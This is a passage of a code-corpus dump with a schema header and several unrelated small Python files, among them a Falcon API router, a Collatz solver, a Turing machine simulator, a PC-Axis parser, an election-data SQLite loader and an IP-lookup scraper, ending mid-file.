__id__
int64 3.09k
19,722B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
256
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 3
values | repo_name
stringlengths 5
109
| repo_url
stringlengths 24
128
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 6.65k
581M
⌀ | star_events_count
int64 0
1.17k
| fork_events_count
int64 0
154
| gha_license_id
stringclasses 16
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
5.76M
⌀ | gha_stargazers_count
int32 0
407
⌀ | gha_forks_count
int32 0
119
⌀ | gha_open_issues_count
int32 0
640
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 2
classes | gha_disabled
bool 1
class | content
stringlengths 9
4.53M
| src_encoding
stringclasses 18
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | year
int64 1.97k
2.01k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
12,429,635,355,859 |
a6ecedb718dde082101d8d56f402386256f26774
|
47cd08356aa3b4793dd52cf658834e3ee3693976
|
/api/app.py
|
b29b597ac41dfdc3cc21950572bc9dad0cd34004
|
[] |
no_license
|
amitgandhinz/cloud_notifications
|
https://github.com/amitgandhinz/cloud_notifications
|
1ea3749c013ca1f1451519e9d0e51e23636e3e12
|
c1fdd1497d756bf7d97ad49cc2978f4b5913b39b
|
refs/heads/master
| 2021-01-25T10:22:06.626504 | 2013-08-31T18:26:25 | 2013-08-31T18:26:25 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# WSGI entry point for the notifications API: wires up the URL routes to
# the long-lived resource objects from the topics/messages/subscribers
# modules.
import falcon
# NOTE(review): `requests` and `json` are imported but unused in this
# module -- candidates for removal if no other tooling relies on them.
import requests
import json
import topics
import messages
import subscribers
# falcon.API instances are callable WSGI apps
app = api = falcon.API()
# Resources are represented by long-lived class instances
topicCollection = topics.TopicCollectionResource()
topicResource = topics.TopicResource()
messageCollection = messages.MessageCollectionResource()
subscriberCollection = subscribers.SubscriberCollectionResource()
subscriberResource = subscribers.SubscriberResource()
# subscriber actions
api.add_route('/v1/topics/{topic_name}/subscribers', subscriberCollection)
api.add_route('/v1/topics/{topic_name}/subscribers/{subscriber_name}', subscriberResource)
# publisher actions
api.add_route('/v1/topics', topicCollection)
api.add_route('/v1/topics/{topic_name}', topicResource)
api.add_route('/v1/topics/{topic_name}/messages', messageCollection)
|
UTF-8
|
Python
| false | false | 2,013 |
17,351,667,896,973 |
45530205cef1cc59dd35fc76098e9bcea89a6e2a
|
06ee26d8446037c9e51c6c3a6889be3726966b68
|
/cls1/eggs/src/lti/composites/pvknob/setup.py
|
f2e49016c937611ae14f7545595746350bd281a7
|
[] |
no_license
|
emayssat/epics-opis
|
https://github.com/emayssat/epics-opis
|
d1492a601a7bb8b3cb858897baeefc02900b28fa
|
a752c9cb955d01c7bb1d612f290c7ea3369a9d5c
|
refs/heads/master
| 2019-07-28T10:07:37.871453 | 2013-10-21T22:27:35 | 2013-10-21T22:27:35 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Static configuration constants for the PvKnob composite.
VERSION = '0.1.0'
COMPOSITE_NAME = 'PvKnob_1'
# Window caption carries the version, e.g. "PvKnob v0.1.0".
WINDOW_TITLE = 'PvKnob v%s' % VERSION

# One debug bit per category; the trailing-underscore names are the
# second (verbose) flag of the same category.
ACTIONS = 1 << 0
ACTIONS_ = 1 << 1
COMPOSITES = 1 << 2
COMPOSITES_ = 1 << 3
CONTAINERS = 1 << 4
CONTAINERS_ = 1 << 5
DIALOGS = 1 << 6
DIALOGS_ = 1 << 7

# Debug everything except the two dialog categories.
DEBUG = (ACTIONS | ACTIONS_
         | COMPOSITES | COMPOSITES_
         | CONTAINERS | CONTAINERS_)

BACKGROUND_COLOR = 'green'
PRECISION = 3
HELP_INDEX_PAGE = "pvknobcomposite_index.html"
STYLESHEET = """
LPvKnobComposite { background-color: Grey }
"""
|
UTF-8
|
Python
| false | false | 2,013 |
7,361,573,958,410 |
b0d3b54cb8c6027031a9bbaca25530864e04554c
|
5a44fe1039cbc8858be71a75bfe08b83a29e8ea3
|
/populate_demo_info.py
|
f00df05553ed420189959a0e94ee3352537f0aae
|
[] |
no_license
|
Jhanani/Tv-Data-Mining-
|
https://github.com/Jhanani/Tv-Data-Mining-
|
edad8c4c25046f947b0a4c797a7e71f8e0c99c4d
|
92f565556bbc5de1911d5f9ca02720c2532e9eec
|
refs/heads/master
| 2021-03-27T20:14:35.775743 | 2014-10-14T19:26:59 | 2014-10-14T19:26:59 | 25,220,514 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import MySQLdb
import fwm_config as fwm_config
# Project-wide configuration object (database parameters etc.).
config = fwm_config.Config()
# Rows are buffered and flushed to MySQL in batches of this size.
BULK_INSERT_MAX_COUNT = 1000
def mysqldb_bulk_insert(db, db_table_name, mysql_data):
    """Bulk-insert demographic rows into table `db_table_name`.

    db            -- database wrapper exposing bulk_insert_no_commit();
                     the caller is responsible for committing afterwards
    db_table_name -- target table name, interpolated into the SQL text
                     (trusted, caller-supplied constant -- not user input)
    mysql_data    -- sequence of rows, one value per column listed below
    """
    # 44 columns; the VALUES placeholders are bound by the driver.
    query = """
    INSERT INTO {0}
    (household_id, household_size, num_adults, num_generations,\
    hh_age_range, hh_head_marital_status, hh_head_race, children_present,\
    num_children, children_age, children_age_range, hh_head_dwelling_type,\
    home_owner_status, hh_head_residence_length, home_market_value, num_vehicles,\
    vehicle_make_code, vehicle_model, vehicle_year, hh_net_worth,\
    hh_income, hh_identify_gender, hh_identify_age, hh_identify_education,\
    hh_identify_occupation, hh_head_education, hh_head_occupation, hh_2nd_age,\
    hh_2nd_education, hh_2nd_occupation, hh_3rd_age, hh_3rd_education,\
    hh_3rd_occupation, hh_4th_age, hh_4th_education, hh_4th_occupation,\
    hh_5th_age, hh_5th_education, hh_5th_occupation, hh_head_political_party,\
    hh_head_voter_party, personicx_cluster_code, personicx_insurance_code, personicx_financial_code)
    VALUES
    (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,\
    %s, %s, %s, %s, %s, %s, %s, %s, %s, %s,\
    %s, %s, %s, %s, %s, %s, %s, %s, %s, %s,\
    %s, %s, %s, %s, %s, %s, %s, %s, %s, %s,\
    %s, %s, %s, %s);
    """.format(db_table_name)
    db.bulk_insert_no_commit(query, mysql_data)
def populate_demo():
db_table_name = 'fwm_demo_04_2014'
db = fwm_config.Database()
demo_dir = '/files2/Temp/demodata/'
demo_file = '4Cinsights.rpt_demodata.20140113.pd'
mysql_bulk_data = list()
with open(demo_dir+demo_file) as f:
for line in f:
entry = line.strip('\n\t\r ').split('|')
entry = [item if len(item)!=0 else None for item in entry]
if entry[7]=='N':
entry[7]=False
elif entry[7]=='Y':
entry[7]=True
#print entry
mysql_bulk_data.append(entry)
if len(mysql_bulk_data) == BULK_INSERT_MAX_COUNT:
print 'Inserting into databse ', len(mysql_bulk_data), ' rows'
mysqldb_bulk_insert(db,db_table_name,mysql_bulk_data)
mysql_bulk_data = list()
db.explicit_commit()
#break
if len(mysql_bulk_data):
print 'Inserting into database ', len(mysql_bulk_data), ' rows'
mysqldb_bulk_insert(db,db_table_name,mysql_bulk_data)
db.explicit_commit()
if __name__ == '__main__':
populate_demo()
|
UTF-8
|
Python
| false | false | 2,014 |
9,964,324,155,485 |
35f67d56b8ba1049cddbc1754b499072bee53915
|
217ff8d9222701f55a4ff5576c09527655483b54
|
/src/commons/Parsers.py
|
044387387f4841e5ce03918617e27980f27e64d5
|
[] |
no_license
|
Wiceradon/SMPD_old
|
https://github.com/Wiceradon/SMPD_old
|
4fee9487c63b1ed4a874df37e58d565807223978
|
b6642fad27e761a1617e6e58c9beabe861c3d9e9
|
refs/heads/master
| 2020-08-04T12:32:45.649653 | 2014-07-22T23:56:43 | 2014-07-22T23:56:43 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Created on 04-04-2013
@author: jakub
'''
def parseIntOrNone(value):
    """Parse value as an int, treating '' and None as missing."""
    missing = value in (None, "")
    return None if missing else int(value)
def parseFloatOrNone(value):
    """Parse value as a float, treating '' and None as missing."""
    if value in (None, ""):
        return None
    return float(value)
def parseSimpleString(value):
    """Return str(value), mapping None to the empty string.

    Fix: compare with `is None` instead of `== None` (PEP 8) -- equality
    can be hijacked by a custom __eq__ on the argument.
    """
    if value is None:
        return ""
    return str(value)
def parsePointToString(p, delim1, delim2):
    """Serialize point p as '<label><delim1><feat1><delim2><feat2>...'."""
    features = delim2.join(str(f) for f in p.FEATURES)
    return str(p.LABEL) + delim1 + features
|
UTF-8
|
Python
| false | false | 2,014 |
3,204,045,620,245 |
4a8f344b611b201b2d14cc6df5177c6ca62580b4
|
bba021fdd82dae7eb5e5a4383fad244851282945
|
/machine.py
|
4c1a3442418b816363c8e82fbc5096b3fda2c488
|
[] |
no_license
|
cottyard/TuringMachineSimulator
|
https://github.com/cottyard/TuringMachineSimulator
|
3ed16d171a15b4ed566d644fc7df08c7116ec401
|
dc8090572993121dea4aa35a7410a884d47e95c1
|
refs/heads/master
| 2016-09-09T23:27:25.791052 | 2014-04-23T14:59:26 | 2014-04-23T14:59:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from abc import ABCMeta, abstractmethod
class ExtensibleList:
    """A list that grows on out-of-range writes and yields a default
    value on out-of-range reads."""

    def __init__(self, default_value):
        self.list = []
        self.default_value = default_value

    def __getitem__(self, index):
        # EAFP: a read past the end simply yields the default.
        try:
            return self.list[index]
        except IndexError:
            return self.default_value

    def __setitem__(self, index, value):
        try:
            self.list[index] = value
        except IndexError:
            if index < 0:
                raise NotSupportedIndex
            # Pad with defaults until the requested slot exists.
            while len(self.list) <= index:
                self.list.append(self.default_value)
            self.list[index] = value

    def __iter__(self):
        return iter(self.list)
class Tape:
    """Turing-machine tape backed by an ExtensibleList.

    Tracks how many squares currently hold a figure ('1' or '0') so the
    driver can stop once the desired output length is reached.
    """
    figures = ('1', '0')

    def __init__(self):
        self._tape = ExtensibleList(' ')
        self._figure_count = 0

    def show_all(self):
        # Print the full tape contents, trailing blanks trimmed.
        print(''.join(self._tape).rstrip())

    def show_output(self):
        # Print only the figures, i.e. the machine's binary output.
        print(''.join(filter(lambda s: s in Tape.figures, self._tape)))

    def write(self, square, symbol):
        """Write symbol at square, keeping the figure count exact.

        Fix: the old code incremented the count even when the square
        already held a figure (double counting) and never decremented
        it when a figure was overwritten by a non-figure symbol.
        """
        if self._tape[square] in Tape.figures:
            self._figure_count -= 1
        self._tape[square] = symbol
        if symbol in Tape.figures:
            self._figure_count += 1

    def erase(self, square):
        # Blank the square, forgetting any figure that was on it.
        if self._tape[square] in Tape.figures:
            self._figure_count -= 1
        self._tape[square] = ' '

    def read(self, square):
        return self._tape[square]

    def figure_count(self):
        return self._figure_count
class TuringMachine:
    """Abstract interface of a Turing machine head (Python 2 ABC style).

    Subclasses provide the four primitive operations; see Machine below
    for the concrete semantics.
    """
    __metaclass__ = ABCMeta

    @abstractmethod
    def r(self):
        """Move the head one square to the right."""

    @abstractmethod
    def l(self):
        """Move the head one square to the left."""

    @abstractmethod
    def p(self, symbol):
        """Print (write) symbol on the current square."""

    @abstractmethod
    def e(self):
        """Erase the current square."""
class Machine(TuringMachine):
def __init__(self):
self.tape = None
self.position = None
self.config = None
self.state = None
def install_tape(self, tape, position):
self.tape = tape
self.position = position
def install_configuration(self, config, begin_state):
self.config = config
self.state = begin_state
def r(self):
self.position += 1
def l(self):
if self.position <= 0:
raise InvalidMachineOperation('trying moving off the tape head')
self.position -= 1
def p(self, symbol):
self.tape.write(self.position, symbol)
def e(self):
self.tape.erase(self.position)
def show_position(self):
print ' ' * self.position + '^'
def scanned_symbol(self):
return self.tape.read(self.position)
def show_mconfig(self):
if self.config is not None:
print 'state:', self.state
def move_to_next_state(self):
self.state = self.config.move(
self.state,
self.scanned_symbol(),
self
)
def run(self, output_length=None):
if output_length is None:
self.move_to_next_state()
else:
while self.tape.figure_count() < output_length:
self.move_to_next_state()
class InvalidMachineOperation(Exception):
    """Raised by Machine.l() when the head would move off the left end."""
    pass
class NotSupportedIndex(Exception):
    """Raised by ExtensibleList.__setitem__ for a negative index past the
    start of the list."""
    pass
|
UTF-8
|
Python
| false | false | 2,014 |
9,938,554,338,129 |
1bbc43f162dda00d62004a7cad7a3b1bb5ea7506
|
977da707534806edad2f85e5b4c75b73da1a23b3
|
/problem14.py
|
9a70fd8878dd7f6daede67a841d70bf278c44ade
|
[] |
no_license
|
rfolk/Project-Euler
|
https://github.com/rfolk/Project-Euler
|
fdb11e1f775441e9ff6adb344abc505ffff351ff
|
a8f9ca8541b9110c44eb85cf0e9f28a7d635b1eb
|
refs/heads/master
| 2016-09-10T19:00:29.734691 | 2013-07-10T20:55:39 | 2013-07-10T20:55:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Russell Folk
# July 9, 2013
# Project Euler #14
# The following iterative sequence is defined for the set of positive integers:
#
# n → n/2 (n is even)
# n → 3n + 1 (n is odd)
#
# Using the rule above and starting with 13, we generate the following
# sequence:
# 13 → 40 → 20 → 10 → 5 → 16 → 8 → 4 → 2 → 1
# It can be seen that this sequence (starting at 13 and finishing at 1)
# contains 10 terms. Although it has not been proved yet (Collatz Problem), it
# is thought that all starting numbers finish at 1.
# Which starting number, under one million, produces the longest chain?
import time
# Memo table: chains[n] caches the Collatz chain length of n (0 = unknown).
chains = []
# Starting numbers are scanned below this bound; the memo table covers
# indices up to 3 * ceiling.
ceiling = 1000001
# Best result found so far: starting number and its chain length.
head = -1
length = -1
def nextChain(n, memo=None, limit=None):
    """Return the Collatz chain length of n (number of terms down to 1).

    memo  -- optional memo table where memo[k] == 0 means "not computed";
             defaults to the module-level `chains` table
    limit -- cache lengths only for n < limit; defaults to 3 * ceiling

    Fixes vs. the original:
    * the cached branch returned chains[n] + 1 although chains[n] already
      stores the full length -- an off-by-one that inflated every
      memoized result (and therefore the reported maximum);
    * n // 2 instead of int(n / 2), which loses precision once
      intermediate values exceed 2**53.
    """
    if memo is None:
        memo = chains
    if limit is None:
        limit = 3 * ceiling
    if n == 1:
        return 1
    if n < limit and memo[n] != 0:
        return memo[n]
    if n % 2 == 0:
        current = nextChain(n // 2, memo, limit)
    else:
        current = nextChain(3 * n + 1, memo, limit)
    result = current + 1
    if n < limit:
        memo[n] = result
    return result
start = time.perf_counter()
# This will initialize found chains from any location to 0
# (index n will hold the memoized chain length of n; 0 == unknown).
for i in range ( 3 * ceiling ) :
    chains.append ( 0 )
# Base case: the chain starting at 1 has exactly one term.
chains [ 1 ] = 1
# Try every candidate starting number below the ceiling.
for i in range ( 2 , ceiling , 1 ) :
    thisHead = i
    thisLength = nextChain ( i )
    #if chains [ thisHead ] == 0 :
    #    chains [ thisHead ] == thisLength
    # Keep the longest chain (and its starting number) seen so far.
    if thisLength > length :
        length = thisLength
        head = thisHead
        #print ( "Working on: " + str ( i ) )
elapsed = ( time.perf_counter() - start )
print ( "The starting number that produces the longest chain is " +
    str ( head ) + " with a chain of " + str ( length ) )
print ( "Calculated in: " + str ( elapsed ) + " seconds." )
|
UTF-8
|
Python
| false | false | 2,013 |
3,582,002,766,940 |
bdb60e7854d092fc8c754c5cd16ee0a587cc405e
|
4f74f7ed0c5d7daa80c5c60f57c4753f87c0cbd9
|
/pyRserve/__init__.py
|
2607529688be59ca29628d38b0f247ebb7e529bc
|
[
"MIT"
] |
permissive
|
aidan/pyrserv
|
https://github.com/aidan/pyrserv
|
1f25e074a782f621bf0cc86a01f3dd4a29362430
|
b8304c41357977d081fbdc2ad88a5b77d52802dc
|
refs/heads/master
| 2021-01-01T05:41:32.880192 | 2012-06-20T14:46:15 | 2012-06-20T14:46:15 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Package initializer for pyRserve: sets the warning policy and
# re-exports the public connection API.
import warnings
# Show all deprecated warning only once:
warnings.filterwarnings('once', category=DeprecationWarning)
# Keep the package namespace clean.
del warnings
# NOTE(review): implicit relative imports -- Python 2 only syntax.
from rconn import rconnect, connect
from taggedContainers import TaggedList
__version__ = '0.5.2'
|
UTF-8
|
Python
| false | false | 2,012 |
4,363,686,796,544 |
43b485e32c27916308393eb0ac9b20835d0e1291
|
7a079c7cae330a0bca46fbd5c97b1ea242d8bb02
|
/pypcaxis.py
|
74a43c4ca715bf5d0d9a7af8a318d96086626ab4
|
[] |
no_license
|
vehrka/pypcaxis
|
https://github.com/vehrka/pypcaxis
|
b5e93bad09f2a8fe89c0880804ceca22369ad917
|
3cb1fe1faf341de61d06f5ed2e3772a2d5adf85f
|
refs/heads/master
| 2021-01-17T21:43:26.781359 | 2014-05-15T11:23:08 | 2014-05-15T11:23:08 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import re
from functools import reduce
from itertools import product
from operator import mul

from pandas import DataFrame
class Dimension(object):
    """One axis of a PC-Axis table: a title plus its category values."""

    def __init__(self, title, values):
        self.title = title
        self.values = values

    def __len__(self):
        # A dimension's length is its number of categories.
        return len(self.values)
class Table(object):
    """A PC-Axis data cube: a flat value list indexed by dimensions.

    `data` is stored in row-major order (the last dimension varies
    fastest), matching the order of itertools.product over the
    dimension value lists.
    """
    def __init__(self):
        self.dimensions = []
        self.data = None

    def add_dimension(self, dimension):
        self.dimensions.append(dimension)

    def get_by(self, title, value):
        """Return a sub-table with dimension `title` fixed to `value`.

        Fixes for the original (which was marked FIXME "does not work"):
        * the result was assigned to `table.dimension` instead of
          `table.dimensions`, so lookups on the sub-table failed;
        * the data was built in reversed(product(...)) order, which
          scrambled it relative to get()'s row-major indexing.
        """
        title_index = [dim.title for dim in self.dimensions].index(title)
        dims = [dim.values for dim in self.dimensions]
        dims[title_index] = [value]
        table = Table()
        table.dimensions = [d for d in self.dimensions if d.title != title]
        table.data = [self.get(*criteria) for criteria in product(*dims)]
        return table

    def get(self, *criteria):
        """Look up one cell; criteria give one value per dimension, in order."""
        dim_lenghts = [len(dim) for dim in self.dimensions]
        dim_indices = [dim.values.index(c) for (dim, c)
                       in zip(self.dimensions, criteria)]
        # Row-major linearization: the stride of axis i is the product
        # of the lengths of all later axes.
        return self.data[sum(reduce(mul, dim_lenghts[i+1:], 1) * index
                             for i, index in enumerate(dim_indices))]
def parse(path):
    """Parse a PC-Axis (.px) file into a Table."""
    value_regex = re.compile(r'VALUES\(\"(.*)\"\)')
    table = Table()
    for record in read_data(path):
        if not record:
            continue
        key, payload = [part.strip() for part in record.split('=', 1)]
        matched = value_regex.match(key)
        if matched:
            # A VALUES("<title>") record declares one dimension of the cube.
            table.add_dimension(create_dimension(matched.group(1), payload))
        if key == 'DATA':
            # The DATA record carries all cell values, space separated.
            table.data = [cell.strip() for cell in payload.split(' ')]
    return table
def read_data(path):
    """Read a .px file, decode it from IBM850 and split it into records.

    Records end with ';' at end of line; CRLF endings are normalized
    first so the split handles both conventions.
    NOTE: `str.decode` is a Python 2 idiom -- this function is py2-only.
    """
    raw = open(path).read().decode('IBM850')
    normalized = raw.replace(';\r\n', ';\n')
    return [record.strip() for record in normalized.split(';\n')]
def create_dimension(title, values):
    """Build a Dimension from a raw PC-Axis value list.

    The raw form is: "foo","bar","zap" (possibly wrapped across lines).
    """
    joined = values.replace('\r\n', '').replace('\n', '')
    # Drop the outer quotes, then split on the quote-comma-quote glue.
    return Dimension(title, joined[1:-1].split('","'))
def to_pandas_df(table):
    """Creates a Pandas DataFrame with the data in the table.

    One row per cell of the cube, one column per dimension (holding that
    cell's category label) plus a final 'values' column with the cell
    value itself.

    Fix: removed the unused local `tblo` (dead code, and a Python 3
    portability hazard via the true division it performed).
    """
    dims = table.dimensions
    total = 1
    ldims = []
    for dim in dims:
        ldims.append(len(dim))
        total *= len(dim)
    # vresult[r] accumulates the dimension labels for row r.
    vresult = total * [0]
    for i, dim in enumerate(dims):
        ldim = ldims[i]
        # rdim = product of the lengths of all later dimensions, i.e.
        # how many consecutive rows share this dimension's label.
        if i < (len(ldims) - 1):
            rdim = 1
            for x in range(i, len(ldims) - 1):
                rdim *= ldims[x+1]
        else:
            rdim = 1
        for udi in range(ldim):
            if i == 0:
                # The first dimension starts each row's label list.
                for j in range(rdim):
                    vresult[j+(udi * rdim)]=[dim.values[udi]]
            else:
                # Later dimensions append their label to existing rows.
                for j in range(0, total, ldim * rdim):
                    for k in range(rdim):
                        vresult[j + k + (udi * rdim)].extend([dim.values[udi]])
    # Append the cell value itself to every row.
    for i, fila in enumerate(vresult):
        fila.extend([table.data[i]])
    colnames = [dim.title for dim in table.dimensions]
    colnames.extend(['values'])
    return DataFrame(vresult, columns=colnames)
if __name__ == '__main__':
    # Smoke test against sample Finnish statistics files
    # (Python 2 print statements).
    table = parse('examples/tulot.px')
    print table.get('2008', 'Tuusula - Tusby', 'Veronalaiset tulot, mediaani')
    print table.get('2009', 'Tuusula - Tusby', 'Veronalaiset tulot, mediaani')
    print table.get('2007', u'Hyvink\xe4\xe4 - Hyvinge', 'Tulonsaajia')
    print table.get_by('Vuosi', '2007').get(u'Hyvink\xe4\xe4 - Hyvinge', 'Tulonsaajia')
    print table.get('2008', 'Tuusula - Tusby', 'Veronalaiset tulot, mediaani')
    table = parse('examples/vaalit.px')
    print table.get('Uudenmaan vaalipiiri', 'VIHR', u'Yhteens\xe4', u'78 vuotta')
|
UTF-8
|
Python
| false | false | 2,014 |
13,666,585,949,729 |
1be50da42a423c3f82f2827c3a1483acdf196ce0
|
8b194dc456edc27a69f0d47dbd889ce85c67937a
|
/webbrowser test.py
|
c0c40ad4f57f425453f0949af5fbf2d7ae23d524
|
[
"GPL-2.0-only"
] |
non_permissive
|
jluellen/sms_ip
|
https://github.com/jluellen/sms_ip
|
b7417958ce9b51d3c4e0c029f6bc7237cdaa520d
|
c3a1505de1f59323ad71b87d0d6ea58144e45fe0
|
refs/heads/master
| 2021-05-24T05:35:35.916091 | 2014-01-22T17:01:53 | 2014-01-22T17:01:53 | 15,212,098 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Scrape this machine's public IP address from whatismyip.com using a
# mechanize browser that masquerades as Firefox (Python 2 script).
import mechanize
import re
br = mechanize.Browser()
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
# Follows refresh 0 but not hangs on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
# Want debugging messages?
#br.set_debug_http(True)
#br.set_debug_redirects(True)
#br.set_debug_responses(True)
# User-Agent (this is cheating, ok?)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
html = br.open('http://www.whatismyip.com/')
html = html.read()
# Best-effort text: drop any bytes that fail to decode.
html = unicode(html, errors='ignore')
match = re.search('<div class="the-ip">(.*)</div>', html)
if match:
    # The page encodes each character of the IP as a numeric HTML
    # entity; decode the entities back to characters.
    chars = re.findall('\&\#(\d*)', match.group(1))
    ip = ''.join([chr(int(char)) for char in chars])
    print ip
|
UTF-8
|
Python
| false | false | 2,014 |
16,810,502,002,361 |
d09d8faf5aeb0fabcf8fe7e4be81afe93ce7be69
|
0bd1542bdece22dfd1a51d67e5eb51597f820fb8
|
/docs/test.py
|
a8e447b4adc1ba1b4b4a149963c395949e44e58c
|
[
"MIT"
] |
permissive
|
jMyles/WHAT
|
https://github.com/jMyles/WHAT
|
4d04119d65d317eb84c00682cb32bea2ed1bc11f
|
69e78d01065142446234e77ea7c8c31e3482af29
|
refs/heads/master
| 2021-01-18T02:18:20.911401 | 2014-10-03T00:39:24 | 2014-10-03T00:39:24 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Print the directory containing this file (third-party `path` module;
# Python 2 print statement).
import sys, os
from path import path
print path(__file__).dirname()
|
UTF-8
|
Python
| false | false | 2,014 |
8,040,178,825,472 |
e1c07e2617ad0b7657eb7745e158466c993f3478
|
6f639f7ae80d3f08729cb415eb6ef549b7982fa4
|
/homework5/create_db.py
|
dfac1e8fec9a0541d645098be2d6db6ff4058172
|
[] |
no_license
|
kuleana/ay250_pyseminar
|
https://github.com/kuleana/ay250_pyseminar
|
6be0654e5b51a2ff2f58fcce3103300ccde8b033
|
7b13a6d23e74f15278502dd027bdd8c2bb977b5c
|
refs/heads/master
| 2020-12-24T13:20:48.693484 | 2012-04-09T04:30:13 | 2012-04-09T04:30:13 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Katherine de Kleer
# 4/6/12
# AY250 homework#8
# modified from AY250 homework#5
import sqlite3
import urllib2
from bs4 import BeautifulSoup
import csv
import os
import datetime
import time
import matplotlib.pyplot as plt
import numpy as np
""" create_db: uses election data from intrade.com in .csv format to create a database of election probabilities for 2012 Presidential Election and Republican Presidential and Vice-Presidential Nomination."""
# create table "races"
connection = sqlite3.connect("races.db")
cursor = connection.cursor()
sql_cmd = """CREATE TABLE races (rid INTEGER PRIMARY KEY AUTOINCREMENT,
race_name TEXT, election_date DATE, data_url HYPERLINK)"""
cursor.execute(sql_cmd)
# populate table "races"
election_data = [
("2012 Republican Presidential Nomination", "8/30/12", "http://www.intrade.com/v4/markets/?eventId=84328"),
("2012 Presidential Election", "12/17/12", "http://www.intrade.com/v4/markets/?eventId=84326"),
("2012 Republican Vice-Presidential Nomination", "8/30/12", "http://www.intrade.com/v4/markets/?eventId=90482")]
for race in election_data:
sql_cmd = ("INSERT INTO races (race_name, election_date, data_url) VALUES " + str(race))
cursor.execute(sql_cmd)
# parse titles of csv files to get candidate names
dir='race_prediction_data/'
subdir=os.listdir(dir)
for item in subdir:
if item[0]=='.':
subdir.remove(item)
candidates = [item.split('_') for item in subdir]
candidates = [[entry[1],entry[0],entry[-1]] for entry in candidates] # creates list [lastname,firstname,race]
candidates.sort()
# create lists of candidates for each race
RepNom = []
RepVPNom = []
PresElect = []
allcand = []
for entry in candidates:
if ([entry[0],entry[1]]) not in allcand:
allcand.append([entry[0],entry[1]])
if entry[2]=='RepNom.csv':
RepNom.append([entry[0],entry[1]])
if entry[2]=='RepVPNom.csv':
RepVPNom.append([entry[0],entry[1]])
if entry[2]=='PresElect.csv':
PresElect.append([entry[0],entry[1]])
# create table "predictions"
connection3 = sqlite3.connect("predictions.db")
cursor3 = connection3.cursor()
sql_cmd = """CREATE TABLE predictions (pid INTEGER PRIMARY KEY AUTOINCREMENT,
date DATE, price FLOAT, volume INTEGER, name TEXT, rid INTEGER)"""
cursor3.execute(sql_cmd)
print '%CREATE_DB: reading .csv datafiles'
# read data from .csv files from intrade.com
for csvfile in subdir:
spamReader = csv.reader(open('race_prediction_data/'+csvfile, 'rb'))
first=csvfile.split('/')[-1].split('.csv')[-2].split('_')[0]
last=csvfile.split('/')[-1].split('.csv')[-2].split('_')[1]
race=csvfile.split('/')[-1].split('.csv')[-2].split('_')[-1]
cand=[last,first]
races=['RepNom','PresElect','RepVPNom']
rid = races.index(race)+1
name = cand[1]+' '+cand[0]
firstrow=True
for row in spamReader:
if firstrow==False:
date = row[0]
price = row[-2]
volume = row[-1]
entry=[date,price,volume,name,rid]
# populate "predictions" table
sql_cmd=("INSERT INTO predictions (date, price, volume, name, rid) VALUES " + str(tuple(entry)))
cursor3.execute(sql_cmd)
else:
firstrow=False
connection.commit()
cursor.close()
connection3.commit()
cursor3.close()
|
UTF-8
|
Python
| false | false | 2,012 |
7,945,689,547,481 |
d45e75f1865d0e83e500c084bc65373352e0b5aa
|
7508aa824d6f295619dfff050b05faf11aebe49c
|
/digerms/statistics.py
|
d0a852b27cba50e900e12e3effed1bacebba3dac
|
[] |
no_license
|
naymen/MELA
|
https://github.com/naymen/MELA
|
e5e97e2deb109c6ce04d5b39df2b35078d88e5d1
|
4d1fccdf50d822c7b70e60fb51e5279b785b97fa
|
refs/heads/master
| 2020-12-11T09:08:28.689411 | 2013-10-15T14:18:39 | 2013-10-15T14:18:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
import numpy as np
import pandas as pd
class Statistics(pd.DataFrame):
    """Ring buffer of per-step simulation statistics on top of a DataFrame.

    Rows form a circular buffer indexed by `_pointer`: `current` is the
    row being written, `advance_frame` moves the pointer and zeroes the
    new current row, `log` fills it from keyword arguments.

    NOTE(review): relies on APIs removed in modern libraries -- `np.float`
    (an alias of builtin float, removed in NumPy 1.24) and `DataFrame.ix`
    (removed in pandas 1.0). Subclassing DataFrame while storing extra
    state (`_pointer`) is also fragile: pandas operations that return new
    frames will not carry it over.
    """
    # One (column name, dtype) pair per recorded metric.
    _stats_fields = (
        ('birth_health_mean', np.float),
        ('birth_health_amin', np.float),
        ('birth_health_amax', np.float),
        ('herbivore_sum', np.float),
        ('total_eaten_mean', np.float),
        ('total_eaten_sum', np.float),
        ('age_median', np.float),
        ('age_mean', np.float),
        ('age_amax', np.float),
        ('gencount_amin', np.uint64),
        ('gencount_amax', np.uint64),
        ('gencount_mean', np.uint64),
        ('health_sum', np.float),
        ('health_mean', np.float),
        ('fitness_max', np.float),
        ('fitness_mean', np.float),
        ('step', np.uint64),
